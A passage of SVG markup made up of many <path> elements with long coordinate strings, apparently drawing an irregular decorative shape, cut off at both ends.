d=\"M1744.9,41.7c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C1749.7,42.1,1747.9,41.8,1744.9,41.7Z\"></path>\n <path d=\"M1685.2,119.2c-.9.1-5.1.4-.8.6-.1-.1,2.4,0,2.6-.2-1.6-.1-2.3-.2-3-.3C1686.3,119.4,1687.7,119.3,1685.2,119.2Z\"></path>\n <path d=\"M1686.5,111.1a45.79,45.79,0,0,1,7.4.5,14.06,14.06,0,0,1-3.6-1C1685.9,110.5,1687.6,111,1686.5,111.1Z\"></path>\n <path d=\"M1699.9,98c-5.9-.4,1.2-.8-5.1-1.1,0,.3,1.9.8-2.2.7a9.4,9.4,0,0,0-3.2-.5c-.3.4,3.6.7,6.1.6.6.2-1.7.2-2.5.3C1695,97.9,1700.4,98.2,1699.9,98Z\"></path>\n <path d=\"M1453.3,87.6c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A7.86,7.86,0,0,1,1453.3,87.6Z\"></path>\n <path d=\"M1744.1,85c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C1742.5,85.3,1748.3,85.2,1744.1,85Z\"></path>\n <path d=\"M1702.2,81.7h0c-9.7.5-1.9,1.9-5.1,2.1,1.6,0,3.3.2,4.9.3a22.85,22.85,0,0,0,3.7,0c-1.6-.1-2.8-.2-3.7-.3-2.9-.4-1.8-1.1,0-1.4a11,11,0,0,1,1.9-.2C1698.9,81.9,1706.6,81.7,1702.2,81.7Z\"></path>\n <path d=\"M1878.8,85c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C1886.6,85.7,1881.6,85.2,1878.8,85Z\"></path>\n <path d=\"M1710.6,81.8c-3-.1-1-.4-1.9-.6C1699.7,80.9,1708.5,82.1,1710.6,81.8Z\"></path>\n <path d=\"M1864.2,74.7c4.5.1,11.5.6,13,.5-5.8-.3-12.8-1.1-6.8-1.4-4.7-.2-.8.3-5.5.1.3-.1,1.8-.2,1-.4a31,31,0,0,0,4.2.1c-1.9-.4,2-.2,2.4-.4-8.4-.3-4,.6-13.7.2-7.6.9,3,2.8-3.5,3.8,2.2.3,2.9.1,4.4.3-4.5.1.1.4-2.1.7a41.63,41.63,0,0,1,6,.5c-2.8-.1-1.5.3-5.5.1-2.5-.1-.4-.5-3.3-.6.8.3-3.8.5-.8.6a98.15,98.15,0,0,1,10,.3c3.9-.6-.1-1.3-4.5-2,.1.1-1,.1-1.4,0,3.3.1,1.3-.3,4-.2s2.4.6,4.8.8a21.32,21.32,0,0,1,4.3.1c-5.7-1.4.5-1.9-8.1-2.9-.1.1.5.3-1.1.3C1861.8,75.1,1862.3,74.8,1864.2,74.7Z\"></path>\n <path d=\"M0,0V30.7c.9,0,1.9,0,3.1.1l.4.4c13.8.4,10.5-.4,11.6-1,12.1.7,5.8,1.4,4.9,2.4a27.94,27.94,0,0,0,6.9-.1c8.1.9-6.5,1.7,5.1,2.6.3-.3,1.4-.6,3.4-.9.4,2-2.5,2.8,0,4.8-2-.1-2.5-.2-4.4-.3,1,.5,6,.7,6.7,1.2-1.7,0-4-.1-4.1,0,2.2.1,1.2.3.3.3,4.7.2,1.6-.3,5.4-.2,6.6.8.6,1.5,6.4,2.5-4,.1-3.4.6-6.2.8,6.4.3,8.8.1,11.7.6-6.2.1-12.2.4-17-.4.1.2-3.9,0-4.1.1,7.4.1,6.3.8,6.8,1.4,6.2.1,7.2.9,3.5.8,3.1.2,5.3.4,4.8.8-7,.3-7.5-.5-10.2-.6,1.1.3-1,.8,2.3,1,1.2-.6,2.7.6,8.5.2.2-.2-3.3-.2-4.6-.5,5.4.1,7.6.3,8.9.6-1.4.4-10.5.1-12.4.2,2.4.3-2.8.7,3.8,1.2-4.2-.6,1-1.3,7.6-.8.8.5-5.4,0-5.4.2,1.9.3,5.4,1.1-3.6.7,2.4.5,5.6.5,10.1.4,1,.5-4.4.3-6.9.1,1.3.3-2.6.2-2.4.4,4.3.3,7.7,0,11.3.3-.2.2-3.6.1-5.4.2,1.4.4,5.6.7,5.2,1.2-9.4,0,.6.7-7.5.9,3.5.1,4.3-.1,5.8.2-.2.2-5.2,0-5.4.2,3.5.1,6.9.1,7.3.4-.9,0-1.6,0-1.3.1-1.46-.17-2.93-.27-4.4-.3,5.4,1.5,6.2,1.8-3.4,2.4,6.2.3,4.5.9,2.4,1.1,4.4,0,4.5.3,7.3.4-1.9-.6,3.9-.2,6.9-.1,1.8-.4-.6-.6,2-.9-4.5-.1-3.8-.5-6.2-.7,3.2,0,4.6-.2,6.7-.3-3.4-.1-5.3-.9-3.6-1,3.5.2-.1.8,6.3.8-3.2-.6,1.6-.4,4.1,0,.1-1.4.4-1.3-2.2-2.6,3.3,0,6.2.4,8.6.3-7.9-.4,1.2-.9,1.6-1.4.4.2-.1.4,1.8.5,4.2-.1-.6-.3,3.9-.4a8.16,8.16,0,0,0,2.7,0c-4.5-.3-5.6-.2-8.7-.4.4-.9,2.8-2.3,16-2.4-3.9.4,4,1-1.6,1.4,3.4,0,3.3.3,7.2.3,1.8-.6,1.3-1.1,4-1.8a13.45,13.45,0,0,0,4.2,0c-1.7-.1-3.4-.1-3-.3a13.45,13.45,0,0,0,4.2,0c-2.7,0-5-.6-1.9-.6,1.5.7,8.8.3,11.8.8.5.5-8.1.1-5.2.4.8-.1,4.4.2,5.5-.1.9.2,6,.7,2.1.8a44.26,44.26,0,0,0-8.3,0c4.7-.1,8.5.1,11.3.3.3.5,2.4,1.2-3.2,1.1a55.14,55.14,0,0,0-5.9-.4c-1.8.3,4.9.2,4.5.4.4.2-.2.4,1.8.5,3.3-.1-2.8-.5,2.3-.5-.8.4,2.5.5,2.1.8-4.2-.1-4.1.2-8.3,0,.8-.3-5.5-.3-5.8-.2,2.3,0,1.7.8,4.5.4-1.4,0-2-.2-.2-.2.2.2,4,.2,4.4.3-1.5.1-1.4.4-3.8.5-2.3-.1-1.1-.3-3.1-.4-4.8.2,11.3,1.2-.4,1.1-.9-.2,1.2-.5-1.9-.6-4.3.3.3.8-3.2,1.1,3.2,0,5.4.1,5.9.4-4.2-.1-5.4.3-2.2.6-2.7.2-4.7-.2-7,0,3.8.1,3.6.7,4.8.8,0-.1.2-.3,2.6-.2,2.8.3-.9.3.6.7,5.3.2,2-.4,5.2-.4-.9.6,4.4.2,4.3.2,5.7.4-1.8.6-5.1.5,5.5,0,10.2.6,11.3.1-6-.3,2.2-.4-3.5-.8,3.3.1,5.3.1,5.5-.1-3.1-.3-5.9.1-7.3-.4,1.7-.9,14.3.1,13.1.7,2.7-.2,1.8-.2.8-.6,4.9.5,3.1-.1,5.4-.2,3.3.3-.1,1.1,5.3,1.3-.3-.7-1.8-1.4-.1-1.6,7.8.6,4.1,1.4,9,2.3-3.3-.1-5.3-.1-5.5.1,3,.3,2.4.9,5.2,1.2-6.1-.1-2.8.6-2.1.8,1.2-.1,10.6.2,6.8-.2.6.2-4.1-.1-4.3-.2a7,7,0,0,0-1.7-.4c6.7,0,.8-.6,6.4-.6-2.7-.1-3,.1-5.6,0,3.6-1.1,2.1-1.4,3.7-2.1-5.2-.7-7.4-1.9-2.1-2.3a36.81,36.81,0,0,1-4.2-.1c4.8-.1.5-.5.5-1,2.7,0,6.1.1,5.4-.2-6.8,0-4.7-.6-1.9-.6a15.66,15.66,0,0,1-2.9-.2c4,0,5.7.7,7.3.4-3-.1-.8-.5-4.7-.5-.8.1-2.9.1-5.5.1-.3-.3-.5-.6-.8-.9-4.9.1-7.9-.3-9.6.1,3.4.1,2.9-.1,7,0-.2.3,1.2,1-4.9.8,4.4.1-2.6,1.2,4.9.9,0,.2-.6.4-2.4.4-4.5,0-6.7-.2-10-.3a19.29,19.29,0,0,1-3.7.6c-.2-.2-4-.2-4.4-.3,1.6-.2-4.6-.6-.5-.6,2.7.1,1.3.4,4.5.4-.4-.3,4.2-.2,2.2-.7-7.8-.4-10.8-2-1.4-1.6-3.2-.6-2.8-.8-7.4-.5,2.5-.4.2-1.1-3.7-1.1,2.7,0,.7-.3,4-.2,2.9.1-.3.6,4.7.7,4.1.1-1.9-.8,2.2-.7-.2.3,5.6.2,4.6.5-4.3-.3-4.6.1-2.4.4-2.7-.3-4.9-.1-4,.2a36.19,36.19,0,0,1,8.7.4c-.6-.7,1.3-1.3,1.2-1.8-.5.2-3.1-.4-6-.5-2.6-.9,3.7-.9,1.2-1.8,2.4.4,5.6-.1,7.2.3-4.3-.1-3.3.8-2.1.8a15.37,15.37,0,0,1,2.8.1c-5.2-1.2,11.7-1,9.7,0a52.3,52.3,0,0,0-5.6,0c1.1.3-1.6.7,3.4.7-3-.9,6.9-.1,10.6-.6-.7-.1-6.1-.1-7.4-.5,3.4-.2,8.1.3,9.8.1-2-.4-6.1-.3-8.8-.5.5-.4,4.6-.6,6.9-.1-.5-.3.3-.4,2.3-.5.1.1,2.6.2,3.1.3.2,1-.3,1.7-1.5,2.4.8-.1,2.1-.1,2.2.1-.1.3-1.4.5-3.7.6,5.7.1,3.2.1,3.1.4,2.7.1,3-.1,5.6,0,.4.7,4.7,1.3,0,1.5a82.23,82.23,0,0,0-11.1,0c-5.7-.9,2-1.7-.7-2.3-3.4.1-2.3.7-6.3.7-.4-.8,7-.9,7.1-1.4a73,73,0,0,0-12,.6c-8.2,0-2.8-1-11-1.4,1.3.6,3.9,1.3,10,1.9-6.8.2-5.2.7-7.2,1.3,5.5-.1.8-.3,8.4.1,1.7-.2-4-.5-.4-.4s2.8.6,6.3.8c-2.3.2-2.9.3-.8.6,3.4.1,5.3-.5,9.7,0-3.8.4.5.2,2,.7-1.3.3-4.8-.1-5.3.3,4.5,0,8.1.8,4.9.9-2.7-.1-1.3-.4-4.3-.2,6.3.5,1.5.8,7.8.9-4.2.4,2,.7-1.8,1.2,3.7.2,4.4,0,5.8.2-4.6.2,6.1.7.8.9-.3-.1,0-.3-1.7-.4,2,.7-5.3-.1-5.3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-